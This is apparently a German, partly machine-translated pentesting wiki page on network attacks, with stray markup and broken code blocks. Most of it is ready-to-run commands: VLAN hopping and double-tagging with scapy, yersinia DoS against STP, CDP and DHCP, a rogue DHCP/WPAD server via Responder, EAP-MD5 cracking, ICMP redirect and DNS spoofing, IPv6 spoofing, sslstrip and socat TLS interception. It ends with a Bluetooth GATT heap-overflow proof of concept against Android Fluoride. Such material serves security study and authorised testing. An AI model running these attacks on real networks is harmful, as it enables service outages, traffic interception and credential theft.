root@kali:~# arp-scan -I eth1.250 10.121.5.0/24

</details>
```bash
# Another configuration example
modprobe 8021q
vconfig add eth1 20
ifconfig eth1.20 192.168.1.2 netmask 255.255.255.0 up

# Another configuration example
sudo vconfig add eth0 30
sudo ip link set eth0.30 up
sudo dhclient -v eth0.30

Automatischer VLAN Hopper

Der beschriebene Angriff mittels Dynamic Trunking und dem Erstellen virtueller Schnittstellen sowie dem Auffinden von Hosts in anderen VLANs wird automatisch von dem Tool durchgeführt: https://github.com/nccgroup/vlan-hopping—frogger

Double Tagging

Wenn ein Angreifer den Wert der MAC, IP and VLAN ID of the victim host kennt, könnte er versuchen, einen Frame zu double tag a frame — also mit seinem eigenen VLAN und dem VLAN des Opfers zu versehen — und ein Paket zu senden. Da das victim won’t be able to connect back mit dem Angreifer, ist die beste Option für den Angreifer, via UDP zu kommunizieren mit Protokollen, die interessante Aktionen durchführen können (wie SNMP).

Eine weitere Option für den Angreifer ist, einen TCP port scan spoofing an IP controlled by the attacker and accessible by the victim zu starten (wahrscheinlich über das Internet). Danach könnte der Angreifer auf dem zweiten von ihm kontrollierten Host mitsniffen, ob dieser Pakete vom Opfer erhält.

Um diesen Angriff durchzuführen, können Sie scapy verwenden: pip install scapy

from scapy.all import *
# Double tagging with ICMP packet (the response from the victim isn't double tagged so it will never reach the attacker)
packet = Ether()/Dot1Q(vlan=1)/Dot1Q(vlan=20)/IP(dst='192.168.1.10')/ICMP()
sendp(packet)

Lateral VLAN Segmentation Bypass

Wenn Sie Zugriff auf einen Switch haben, mit dem Sie direkt verbunden sind, können Sie die VLAN-Segmentierung im Netzwerk umgehen. Schalten Sie einfach den Port in den trunk mode (auch als trunk bekannt), erstellen Sie virtuelle Interfaces mit den IDs der Ziel-VLANs und konfigurieren Sie eine IP-Adresse. Sie können versuchen, die Adresse dynamisch per DHCP anzufordern oder sie statisch zu konfigurieren. Es kommt auf den Einzelfall an.

Lateral VLAN Segmentation Bypass

Layer 3 Private VLAN Bypass

In bestimmten Umgebungen, wie Gast-WLANs, werden Einstellungen für port isolation (auch als private VLAN bekannt) implementiert, um zu verhindern, dass Clients, die mit einem Access Point verbunden sind, direkt miteinander kommunizieren. Es wurde jedoch eine Technik identifiziert, die diese Isolationsmaßnahmen umgehen kann. Diese Technik nutzt entweder das Fehlen von network ACLs oder deren fehlerhafte Konfiguration aus, wodurch IP-Pakete über einen Router geroutet werden können, um einen anderen Client im selben Netzwerk zu erreichen.

Der Angriff wird durchgeführt, indem ein Paket erstellt wird, das die IP-Adresse des Zielclients trägt, jedoch mit der MAC-Adresse des Routers. Dadurch leitet der Router das Paket irrtümlich an den Zielclient weiter. Dieser Ansatz ähnelt dem bei Double Tagging Attacks verwendeten, bei dem die Kontrolle über einen für das Opfer zugänglichen Host genutzt wird, um die Sicherheitslücke auszunutzen.

Wesentliche Schritte des Angriffs:

1. Erstellung eines Pakets: Es wird ein speziell gestaltetes Paket erstellt, das die IP-Adresse des Zielclients enthält, jedoch mit der MAC-Adresse des Routers.
2. Ausnutzung des Router-Verhaltens: Das gefertigte Paket wird an den Router gesendet, der aufgrund der Konfiguration das Paket an den Zielclient weiterleitet und damit die durch private VLAN-Einstellungen bereitgestellte Isolation umgeht.

VTP Attacks

VTP (VLAN Trunking Protocol) zentralisiert die VLAN-Verwaltung. Es verwendet Revisionsnummern, um die Integrität der VLAN-Datenbank zu gewährleisten; jede Änderung erhöht diese Nummer. Switches übernehmen Konfigurationen mit höheren Revisionsnummern und aktualisieren ihre eigenen VLAN-Datenbanken.

VTP Domain Roles

• VTP Server: Verwaltet VLANs — erstellt, löscht, ändert. Sendet VTP-Ankündigungen an Domain-Mitglieder.
• VTP Client: Empfängt VTP-Ankündigungen, um seine VLAN-Datenbank zu synchronisieren. Diese Rolle ist in der lokalen VLAN-Konfiguration eingeschränkt.
• VTP Transparent: Beteiligt sich nicht an VTP-Updates, leitet jedoch VTP-Ankündigungen weiter. Nicht von VTP-Angriffen betroffen, behält es eine konstante Revisionsnummer von null bei.

VTP Advertisement Types

• Summary Advertisement: Wird alle 300 Sekunden vom VTP-Server gesendet und enthält wichtige Domain-Informationen.
• Subset Advertisement: Wird nach VLAN-Konfigurationsänderungen gesendet.
• Advertisement Request: Vom VTP-Client ausgesendet, um ein Summary Advertisement anzufordern, typischerweise als Reaktion auf das Erkennen einer höheren Konfigurationsrevisionsnummer.

VTP-Schwachstellen sind ausschließlich über trunk ports ausnutzbar, da VTP-Ankündigungen nur über diese zirkulieren. Nach DTP-Angriffsszenarien kann der Fokus auf VTP wechseln. Tools wie Yersinia können VTP-Angriffe erleichtern, mit dem Ziel, die VLAN-Datenbank zu löschen und so das Netzwerk effektiv zu stören.

Hinweis: Diese Diskussion bezieht sich auf VTP Version 1 (VTPv1).

yersinia -G # Launch Yersinia in graphical mode

In Yersinia’s graphical mode wähle die Option deleting all VTP vlans, um die VLAN-Datenbank zu leeren.

STP-Angriffe

Wenn du keine BPDU-Frames auf deinen Schnittstellen erfassen kannst, ist es unwahrscheinlich, dass du einen STP-Angriff erfolgreich durchführst.

STP BPDU DoS

Das Senden vieler BPDUs — TCP (Topology Change Notification) oder Conf (die BPDUs, die gesendet werden, wenn die Topologie erstellt wird) — überlastet die Switches, sodass sie nicht mehr korrekt arbeiten.

yersinia stp -attack 2
yersinia stp -attack 3
#Use -M to disable MAC spoofing

STP TCP Attack

Wenn ein TCP gesendet wird, wird die CAM table der switches nach 15s gelöscht. Wenn du dann kontinuierlich diese Art von packets sendest, wird die CAM table kontinuierlich neu gestartet (oder alle 15segs) und wenn sie neu gestartet ist, verhält sich der switch wie ein hub

yersinia stp -attack 1 #Will send 1 TCP packet and the switch should restore the CAM in 15 seconds
yersinia stp -attack 0 #Will send 1 CONF packet, nothing else will happen

STP Root Attack

Der Angreifer simuliert das Verhalten eines Switches, um der STP root des Netzwerks zu werden. Dann wird mehr Datenverkehr über ihn geleitet. Das ist interessant, wenn du mit zwei verschiedenen Switches verbunden bist.
Dies wird durchgeführt, indem BPDUs CONF packets gesendet werden, die angeben, dass der priority-Wert kleiner ist als die tatsächliche Priorität des aktuellen root switch.

yersinia stp -attack 4 #Behaves like the root switch
yersinia stp -attack 5 #This will make the device behaves as a switch but will not be root

Wenn der attacker mit zwei Switches verbunden ist, kann er die Wurzel des neuen Baums werden und der gesamte Verkehr zwischen diesen Switches über ihn geleitet werden (a MITM attack will be performed).

yersinia stp -attack 6 #This will cause a DoS as the layer 2 packets wont be forwarded. You can use Ettercap to forward those packets "Sniff" --> "Bridged sniffing"
ettercap -T -i eth1 -B eth2 -q #Set a bridge between 2 interfaces to forwardpackages

CDP Angriffe

CISCO Discovery Protocol (CDP) ist unerlässlich für die Kommunikation zwischen CISCO-Geräten und ermöglicht ihnen, sich gegenseitig zu identifizieren und Konfigurationsdetails auszutauschen.

Passive Datensammlung

CDP ist so konfiguriert, dass es Informationen über alle Ports aussendet, was ein Sicherheitsrisiko darstellen kann. Ein Angreifer, der sich an einen Switch-Port anschließt, könnte network sniffers wie Wireshark, tcpdump oder Yersinia einsetzen. Diese Aktion kann sensible Daten über das Netzwerkgerät offenlegen, einschließlich Modell und der Version von Cisco IOS, die darauf läuft. Der Angreifer könnte dann spezifische Schwachstellen in der identifizierten Cisco IOS-Version anvisieren.

Auslösen von CDP Table Flooding

Ein aggressiverer Ansatz besteht darin, eine Denial of Service (DoS)-Attacke durch Überfluten des Speichers des Switches auszulösen, indem man sich als legitime CISCO-Geräte ausgibt. Nachfolgend die Befehlsfolge zum Starten eines solchen Angriffs mit Yersinia, einem Netzwerk-Tool, das für Tests entwickelt wurde:

sudo yersinia cdp -attack 1 # Initiates a DoS attack by simulating fake CISCO devices
# Alternatively, for a GUI approach:
sudo yersinia -G

Während dieses Angriffs werden die CPU des Switches und die CDP neighbor table stark belastet, was aufgrund des übermäßigen Ressourcenverbrauchs häufig als “Netzwerkparalyse” bezeichnet wird.

CDP Impersonation Attack

sudo yersinia cdp -attack 2 #Simulate a new CISCO device
sudo yersinia cdp -attack 0 #Send a CDP packet

You could also use scapy. Be sure to install it with scapy/contrib package.

VoIP-Angriffe und das VoIP Hopper Tool

VoIP-Telefone, die zunehmend mit IoT-Geräten integriert werden, bieten Funktionen wie das Entriegeln von Türen oder die Steuerung von Thermostaten über spezielle Telefonnummern. Diese Integration kann jedoch Sicherheitsrisiken bergen.

Das Tool voiphopper ist dafür ausgelegt, ein VoIP-Telefon in verschiedenen Umgebungen (Cisco, Avaya, Nortel, Alcatel-Lucent) zu emulieren. Es ermittelt die VLAN ID des Sprachnetzwerks mithilfe von Protokollen wie CDP, DHCP, LLDP-MED und 802.1Q ARP.

VoIP Hopper bietet drei Modi für das Cisco Discovery Protocol (CDP):

1. Sniff Mode (-c 0): Analysiert Netzwerkpakete, um die VLAN ID zu identifizieren.
2. Spoof Mode (-c 1): Erzeugt benutzerdefinierte Pakete, die diejenigen eines echten VoIP-Geräts nachahmen.
3. Spoof with Pre-made Packet Mode (-c 2): Sendet Pakete, die mit denen eines bestimmten Cisco IP-Telefonmodells identisch sind.

Der bevorzugte Modus für Geschwindigkeit ist der dritte. Er erfordert die Angabe von:

• der Netzwerkschnittstelle des Angreifers (-i Parameter).
• dem Namen des zu emulierenden VoIP-Geräts (-E Parameter), entsprechend dem Cisco-Namensformat (z. B. SEP gefolgt von einer MAC address).

In Unternehmensumgebungen kann man, um ein bestehendes VoIP-Gerät zu imitieren, folgendes tun:

• Das MAC-Label auf dem Telefon überprüfen.
• In den Display-Einstellungen des Telefons nach Modellinformationen suchen.
• Das VoIP-Gerät an einen Laptop anschließen und CDP-Anfragen mit Wireshark beobachten.

Ein Beispielbefehl, um das Tool im dritten Modus auszuführen, wäre:

voiphopper -i eth1 -E 'SEP001EEEEEEEEE ' -c 2

DHCP Attacks

Enumeration

nmap --script broadcast-dhcp-discover
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-16 05:30 EDT
WARNING: No targets were specified, so 0 hosts scanned.
Pre-scan script results:
| broadcast-dhcp-discover:
|   Response 1 of 1:
|     IP Offered: 192.168.1.250
|     DHCP Message Type: DHCPOFFER
|     Server Identifier: 192.168.1.1
|     IP Address Lease Time: 1m00s
|     Subnet Mask: 255.255.255.0
|     Router: 192.168.1.1
|     Domain Name Server: 192.168.1.1
|_    Domain Name: mynet
Nmap done: 0 IP addresses (0 hosts up) scanned in 5.27 seconds

DoS

Two types of DoS könnten gegen DHCP servers durchgeführt werden. Die erste besteht darin, simulate enough fake hosts to use all the possible IP addresses.
Dieser Angriff funktioniert nur, wenn du die Antworten des DHCP server sehen und das Protokoll komplett abschließen kannst (Discover (Comp) –> Offer (server) –> Request (Comp) –> ACK (server)). Zum Beispiel ist dies not possible in Wifi networks.

Eine andere Möglichkeit, einen DHCP DoS durchzuführen, ist, ein DHCP-RELEASE packet using as source code every possible IP zu senden. Dann wird der server denken, dass alle die IP nicht mehr verwenden.

yersinia dhcp -attack 1
yersinia dhcp -attack 3 #More parameters are needed

Eine automatisiertere Art, dies zu tun, ist die Verwendung des Tools DHCPing

Du könntest die erwähnten DoS-Angriffe verwenden, um Clients zu zwingen, neue Leases im Umfeld zu erhalten, und legitime Server so zu erschöpfen, dass sie nicht mehr reagieren. Wenn die legitimen Server dann versuchen, sich neu zu verbinden, kannst du bösartige Werte bereitstellen, die im nächsten Angriff erwähnt werden.

Schädliche Werte setzen

Ein rogue DHCP-Server kann mit dem DHCP-Skript unter /usr/share/responder/DHCP.py eingerichtet werden. Das ist nützlich für Netzwerkangriffe, z. B. zum Abgreifen von HTTP-Verkehr und Credentials, indem Traffic zu einem bösartigen Server umgeleitet wird. Das Setzen eines rogue Gateways ist jedoch weniger effektiv, da es nur ausgehenden Traffic vom Client erfasst und die Antworten des echten Gateways verpasst. Stattdessen wird empfohlen, einen rogue DNS- oder WPAD-Server einzurichten, um den Angriff effektiver zu gestalten.

Unten stehen die Kommandooptionen zum Konfigurieren des rogue DHCP-Servers:

• Our IP Address (Gateway Advertisement): Use -i 10.0.0.100 to advertise your machine’s IP as the gateway.
• Local DNS Domain Name: Optionally, use -d example.org to set a local DNS domain name.
• Original Router/Gateway IP: Use -r 10.0.0.1 to specify the IP address of the legitimate router or gateway.
• Primary DNS Server IP: Use -p 10.0.0.100 to set the IP address of the rogue DNS server you control.
• Secondary DNS Server IP: Optionally, use -s 10.0.0.1 to set a secondary DNS server IP.
• Netmask of Local Network: Use -n 255.255.255.0 to define the netmask for the local network.
• Interface for DHCP Traffic: Use -I eth1 to listen for DHCP traffic on a specific network interface.
• WPAD Configuration Address: Use -w “http://10.0.0.100/wpad.dat” to set the address for WPAD configuration, assisting in web traffic interception.
• Spoof Default Gateway IP: Include -S to spoof the default gateway IP address.
• Respond to All DHCP Requests: Include -R to make the server respond to all DHCP requests, but be aware that this is noisy and can be detected.

Durch korrektes Verwenden dieser Optionen kann ein rogue DHCP-Server eingerichtet werden, um Netzwerkverkehr effektiv abzufangen.

# Example to start a rogue DHCP server with specified options
!python /usr/share/responder/DHCP.py -i 10.0.0.100 -d example.org -r 10.0.0.1 -p 10.0.0.100 -s 10.0.0.1 -n 255.255.255.0 -I eth1 -w "http://10.0.0.100/wpad.dat" -S -R

EAP-Angriffe

Hier sind einige Angriffstaktiken, die gegen 802.1X-Implementierungen eingesetzt werden können:

• Aktives brute-force Durchprobieren von Passwörtern über EAP
• Angriff auf den RADIUS-Server mit fehlerhaften EAP-Inhalten **(exploits)
• Erfassen von EAP-Nachrichten und offline Passwort-Knacken (EAP-MD5 und PEAP)
• Erzwingen der EAP-MD5-Authentifizierung, um die TLS-Zertifikatsvalidierung zu umgehen
• Einspeisen bösartigen Netzwerkverkehrs nach der Authentifizierung über einen Hub oder Ähnliches

Wenn sich der Angreifer zwischen dem Opfer und dem Authentifizierungsserver befindet, könnte er versuchen, das Authentifizierungsprotokoll (falls nötig) auf EAP-MD5 herabzustufen und den Authentifizierungsversuch abzufangen. Dann könnte er dies per brute-force knacken mit:

eapmd5pass –r pcap.dump –w /usr/share/wordlist/sqlmap.txt

FHRP (GLBP & HSRP) Attacks

FHRP (First Hop Redundancy Protocol) ist eine Klasse von Netzwerkprotokollen, die dazu dienen, ein redundantes, hochverfügbares Routing-System zu erstellen. Mit FHRP können physische Router zu einem einzigen logischen Gerät zusammengefasst werden, was die Fehlertoleranz erhöht und bei der Lastverteilung hilft.

Ingenieure von Cisco Systems haben zwei FHRP-Protokolle entwickelt, GLBP und HSRP.

GLBP & HSRP Attacks

RIP

Es sind drei Versionen des Routing Information Protocol (RIP) bekannt: RIP, RIPv2 und RIPng. Bei RIP und RIPv2 werden Datagramme über UDP an Port 520 an Peers gesendet, während RIPng Datagramme über IPv6-Multicast an UDP-Port 521 broadcastet. RIPv2 führte Unterstützung für MD5-Authentifizierung ein. RIPng hingegen enthält keine native Authentifizierung und verlässt sich stattdessen auf optionale IPsec AH- und ESP-Header innerhalb von IPv6.

• RIP und RIPv2: Die Kommunikation erfolgt über UDP-Datagramme auf Port 520.
• RIPng: Nutzt UDP-Port 521, um Datagramme via IPv6-Multicast zu broadcasten.

Beachte, dass RIPv2 MD5-Authentifizierung unterstützt, während RIPng keine native Authentifizierung beinhaltet und auf IPsec AH- und ESP-Header in IPv6 angewiesen ist.

EIGRP Attacks

EIGRP (Enhanced Interior Gateway Routing Protocol) ist ein dynamisches Routing-Protokoll. Es ist ein Distance-Vector-Protokoll. Wenn keine Authentifizierung und keine Konfiguration passiver Interfaces vorhanden ist, kann ein Angreifer in das EIGRP-Routing eingreifen und eine Routing-Tabellen-Vergiftung verursachen. Außerdem ist ein EIGRP-Netzwerk (also das autonome System) flach und nicht in Zonen segmentiert. Wenn ein Angreifer eine Route injiziert, ist es wahrscheinlich, dass sich diese Route im gesamten autonomen EIGRP-System ausbreitet.

Um ein EIGRP-System anzugreifen, ist es erforderlich, eine Nachbarschaft mit einem legitimen EIGRP-Router herzustellen, was viele Möglichkeiten eröffnet, von grundlegender Aufklärung bis hin zu verschiedenen Injektionen.

FRRouting ermöglicht es, einen virtuellen Router zu betreiben, der BGP, OSPF, EIGRP, RIP und andere Protokolle unterstützt. Alles, was Sie tun müssen, ist, ihn auf dem System des Angreifers bereitzustellen, und Sie können sich tatsächlich als legitimer Router in der Routing-Domäne ausgeben.

EIGRP Attacks

Coly verfügt über Möglichkeiten, EIGRP-Broadcasts abzufangen. Es erlaubt auch die Injektion von Paketen, die verwendet werden können, um Routing-Konfigurationen zu verändern.

OSPF

Im Open Shortest Path First (OSPF)-Protokoll wird MD5-Authentifizierung häufig verwendet, um die Kommunikation zwischen Routern zu sichern. Diese Sicherheitsmaßnahme kann jedoch mit Werkzeugen wie Loki und John the Ripper kompromittiert werden. Diese Tools sind in der Lage, MD5-Hashes zu erfassen und zu knacken, wodurch der Authentifizierungsschlüssel offengelegt wird. Sobald dieser Schlüssel erlangt ist, kann er verwendet werden, um neue Routing-Informationen einzuführen. Zur Konfiguration der Routenparameter und zum Setzen des kompromittierten Schlüssels werden jeweils die Injection- und Connection-Tabs verwendet.

• Erfassen und Knacken von MD5-Hashes: Dafür werden Tools wie Loki und John the Ripper verwendet.
• Konfiguration der Routenparameter: Erfolgt über den Injection-Tab.
• Setzen des kompromittierten Schlüssels: Der Schlüssel wird im Connection-Tab konfiguriert.

Other Generic Tools & Sources

• Above: Tool zum Scannen von Netzwerkverkehr und Auffinden von Schwachstellen
• Sie finden einige more information about network attacks here.

Spoofing

Der Angreifer konfiguriert alle Netzwerkparameter (GW, IP, DNS) des neuen Mitglieds im Netzwerk, indem er gefälschte DHCP-Antworten sendet.

Ettercap
yersinia dhcp -attack 2 #More parameters are needed

ARP Spoofing

Siehe previous section.

ICMPRedirect

ICMP Redirect besteht darin, ein ICMP packet type 1 code 5 zu senden, das anzeigt, dass der attacker der beste Weg ist, um eine IP zu erreichen. Wenn die victim die IP kontaktieren möchte, sendet sie das packet dann über den attacker.

Ettercap
icmp_redirect
hping3 [VICTIM IP ADDRESS] -C 5 -K 1 -a [VICTIM DEFAULT GW IP ADDRESS] --icmp-gw [ATTACKER IP ADDRESS] --icmp-ipdst [DST IP ADDRESS] --icmp-ipsrc [VICTIM IP ADDRESS] #Send icmp to [1] form [2], route to [3] packets sent to [4] from [5]

DNS Spoofing

Der Angreifer löst einige (oder alle) Domains auf, die das Opfer anfragt.

set dns.spoof.hosts ./dns.spoof.hosts; dns.spoof on

Eigene DNS mit dnsmasq konfigurieren

apt-get install dnsmasq
echo "addn-hosts=dnsmasq.hosts" > dnsmasq.conf
echo "127.0.0.1   domain.example.com" > dnsmasq.hosts
sudo dnsmasq -C dnsmasq.conf --no-daemon
dig @localhost domain.example.com # Test the configured DNS

Lokale Gateways

Mehrere Routen zu Systemen und Netzwerken existieren oft. Nachdem Sie eine Liste von MAC-Adressen im lokalen Netzwerk erstellt haben, verwenden Sie gateway-finder.py, um Hosts zu identifizieren, die IPv4 forwarding unterstützen.

</details>


### [Spoofing LLMNR, NBT-NS, and mDNS](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)

Für die lokale Host-Auflösung, wenn DNS-Abfragen fehlschlagen, verlassen sich Microsoft-Systeme auf **Link-Local Multicast Name Resolution (LLMNR)** und den **NetBIOS Name Service (NBT-NS)**. Ebenso nutzen **Apple Bonjour** und **Linux zero-configuration**-Implementierungen **Multicast DNS (mDNS)**, um Systeme im Netzwerk zu entdecken. Aufgrund der nicht authentifizierten Natur dieser Protokolle und ihrer Funktionsweise über UDP‑Broadcasts können sie von Angreifern ausgenutzt werden, die Benutzer auf bösartige Dienste umleiten wollen.

Sie können Dienste, nach denen Hosts suchen, mit Responder vortäuschen, indem Sie gefälschte Antworten senden.\
Weitere Informationen dazu: [how to Impersonate services with Responder](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md).

### [Spoofing WPAD](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)

Browser verwenden häufig das **Web Proxy Auto-Discovery (WPAD) Protokoll**, um Proxy-Einstellungen automatisch zu beziehen. Dabei werden Konfigurationsdaten von einem Server abgerufen, typischerweise über eine URL wie "http://wpad.example.org/wpad.dat". Die Entdeckung dieses Servers durch Clients kann auf verschiedenen Wegen erfolgen:

- Über **DHCP**, wobei die Entdeckung durch die Verwendung eines speziellen Code-252-Eintrags ermöglicht wird.
- Über **DNS**, wobei nach einem Hostnamen mit der Bezeichnung _wpad_ innerhalb der lokalen Domain gesucht wird.
- Über **Microsoft LLMNR und NBT-NS**, die als Fallback-Mechanismen verwendet werden, wenn DNS-Abfragen fehlschlagen.

Das Tool Responder nutzt dieses Protokoll aus, indem es als **malicious WPAD server** auftritt. Es verwendet DHCP, DNS, LLMNR und NBT-NS, um Clients dazu zu bringen, sich damit zu verbinden. Mehr dazu: [check this](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md).

### [Spoofing SSDP and UPnP devices](spoofing-ssdp-and-upnp-devices.md)

Sie können im Netzwerk verschiedene Dienste anbieten, um **einen Benutzer zu täuschen**, damit er einige **plain-text credentials** eingibt. **Weitere Informationen zu diesem Angriff in** [**Spoofing SSDP and UPnP Devices**](spoofing-ssdp-and-upnp-devices.md)**.**

### IPv6 Neighbor Spoofing

Dieser Angriff ist dem ARP Spoofing sehr ähnlich, aber in der IPv6‑Welt. Sie können das Opfer dazu bringen zu glauben, dass die IPv6-Adresse des GW die MAC-Adresse des Angreifers hat.
```bash
sudo parasite6 -l eth0 # This option will respond to every requests spoofing the address that was requested
sudo fake_advertise6 -r -w 2 eth0 <Router_IPv6> #This option will send the Neighbor Advertisement packet every 2 seconds

sysctl -w net.ipv6.conf.all.forwarding=1 4
ip route add default via <ROUTER_IPv6> dev wlan0
fake_router6 wlan0 fe80::01/16

dhcp6.spoof on
dhcp6.spoof.domains <list of domains>

mitm6

apt-get install sslstrip
sslstrip -w /tmp/sslstrip.log --all - l 10000 -f -k
#iptables --flush
#iptables --flush -t nat
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables -A INPUT -p tcp --destination-port 10000 -j ACCEPT

sudo nc -l -p 80
socat TCP4-LISTEN:80,fork,reuseaddr -

FILENAME=server
# Generate a public/private key pair:
openssl genrsa -out $FILENAME.key 1024
# Generate a self signed certificate:
openssl req -new -key $FILENAME.key -x509 -sha256 -days 3653 -out $FILENAME.crt
# Generate the PEM file by just appending the key and certificate files:
cat $FILENAME.key $FILENAME.crt >$FILENAME.pem

sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0 -

sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0  openssl-connect:[SERVER]:[PORT],verify=0

</details>


### Aktive Discovery-Hinweise

Beachte, dass wenn ein UDP-Paket an ein Gerät gesendet wird, das den angeforderten Port nicht hat, ein ICMP (Port Unreachable) zurückgesendet wird.

### **ARP discover**

ARP-Pakete werden verwendet, um herauszufinden, welche IP-Adressen im Netzwerk genutzt werden. Der PC muss für jede mögliche IP-Adresse eine Anfrage senden; nur die tatsächlich genutzten Adressen antworten.

### **mDNS (multicast DNS)**

Bettercap sendet eine MDNS-Anfrage (alle X ms) für **\_services\_.dns-sd.\_udp.local**; die Maschine, die dieses Paket sieht, antwortet normalerweise auf diese Anfrage. Anschließend sucht es nur nach Maschinen, die auf "services" antworten.

**Tools**

- Avahi-browser (--all)
- Bettercap (net.probe.mdns)
- Responder

### **NBNS (NetBios Name Server)**

Bettercap sendet Broadcast-Pakete an Port 137/UDP und fragt nach dem Namen "CKAAAAAAAAAAAAAAAAAAAAAAAAAAA".

### **SSDP (Simple Service Discovery Protocol)**

Bettercap sendet SSDP-Broadcast-Pakete und sucht nach allen Arten von Services (UDP Port 1900).

### **WSD (Web Service Discovery)**

Bettercap sendet WSD-Broadcast-Pakete und sucht nach Services (UDP Port 3702).


## Bluetooth (L2CAP/ATT/GATT) Attacks

- Android Fluoride exposes services over L2CAP PSMs (e.g., SDP 0x0001, RFCOMM 0x0003, BNEP 0x000F, AVCTP 0x0017/0x001B, AVDTP 0x0019, ATT/GATT 0x001F). Services werden registriert über:
```c
uint16_t L2CA_Register2(uint16_t psm, const tL2CAP_APPL_INFO& p_cb_info,
bool enable_snoop, tL2CAP_ERTM_INFO* p_ertm_info,
uint16_t my_mtu, uint16_t required_remote_mtu,
uint16_t sec_level);

acl  = ACLConnection(src_bdaddr, dst_bdaddr, auth_mode='justworks')
gatt = acl.l2cap_connect(psm=PSM_ATT, mtu=672)
gatt.send_frag(p8(GATT_READ)+p16(1234))
print(gatt.recv())

# GATT_REQ_READ_MULTI_VAR (0x20), MTU=55
acl  = ACLConnection(interface, bdaddr)
gatt = acl.l2cap_connect(psm=PSM_ATT, mtu=55)
pkt  = b'\x20'  # opcode
pkt += p16(9); pkt += p16(9); pkt += p16(9); pkt += p16(9)
gatt.send(pkt)
# On 4th insert: p_buf->len=55 (1 + 3*(16+2)), total_len=73 -> len=16-(73-55)=-2 -> ~64KB overwrite